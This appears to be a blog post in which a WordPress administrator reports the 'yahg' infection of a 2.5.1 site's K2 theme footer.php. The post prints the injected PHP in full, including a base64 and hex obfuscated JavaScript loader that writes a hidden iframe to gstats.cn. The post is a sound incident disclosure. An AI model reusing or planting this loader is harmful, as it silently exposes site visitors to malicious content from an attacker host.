yahg vunerability again

The yagh bug referred to here just happened in my wordpress system running 2.5.1 in a different form. This previously happened on the previous 2.3.x system back in March exactly like the description in the link above.

The server is running a FC6 fedora with apache and very limited server access. It modified the active theme’s footer.php.

The generated output was :-

</div> <!-- .content -->

	<script>function
    EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt(
    CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C(
    DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var
    EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var
    E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0;
    C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length;
    C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){
    E60247718C17F3D8F853817B5+=( String.fromCharCode(
    EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr(
    C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval(
    E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C("
    646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B
    ");</script>
	<div class
    ="clear"></div>
</div> <!-- Close
Page -->

It attached itself to the top of the K2 theme footer.php.

<?php
if (!isset($_COOKIE["yahg"])) echo base64_decode('PHNjcmlwdD5mdW5jdGlvbiBFRTI4QzVCQjg2QjZFNTkwMjg2NjlGNUNEQzg3RjZGOChDRjI5MDg3ODYwNTU0NTFCKXtyZXR1cm4ocGFyc2VJbnQoQ0YyOTA4Nzg2MDU1NDUxQiwxNikpO31mdW5jdGlvbiBFNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoRENDRURENEZCOEIzMjYzNEI3Myl7ZnVuY3Rpb24gREUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKXt2YXIgRUU3OUQyQzc1OTQ5NEM2QjAwRDFGNEZEQzc0NzM0Mz0yO3JldHVybiBFRTc5RDJDNzU5NDk0QzZCMDBEMUY0RkRDNzQ3MzQzO312YXIgRTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNT0iIjtmb3IoQzlCMURBQjIyMkVENDc5NTVFMTI0REI2RjgzQTk9MDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOTxEQ0NFREQ0RkI4QjMyNjM0QjczLmxlbmd0aDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOSs9REUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKSl7RTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNSs9KCBTdHJpbmcuZnJvbUNoYXJDb2RlKEVFMjhDNUJCODZCNkU1OTAyODY2OUY1Q0RDODdGNkY4KERDQ0VERDRGQjhCMzI2MzRCNzMuc3Vic3RyKEM5QjFEQUIyMjJFRDQ3OTU1RTEyNERCNkY4M0E5LERFMUIzNjUwMTREMDcwOEI3ODVDMzE5KCkpKSkpO31ldmFsKEU2MDI0NzcxOEMxN0YzRDhGODUzODE3QjUpO31FNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoIjY0NkY2Mzc1NkQ2NTZFNzQyRTc3NzI2OTc0NjUyODIyM0M2OTY2NzI2MTZENjUyMDczNzI2MzNENjg3NDc0NzAzQTJGMkY2NzczNzQ2MTc0NzMyRTYzNkUyMDczNzQ3OTZDNjUzRDY0Njk3MzcwNkM2MTc5M0E2RTZGNkU2NTNFM0MyRjY5NjY3MjYxNkQ2NTNFMjIyOTNCIik7PC9zY3JpcHQ+');
 /* K2 Hook */ do_action('template_after_content'); ?>

	<div class="clear"></div>
</div> <!-- Close Page -->

I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I’d guess that it was wordpress vunerability. Just bringing it to your attention.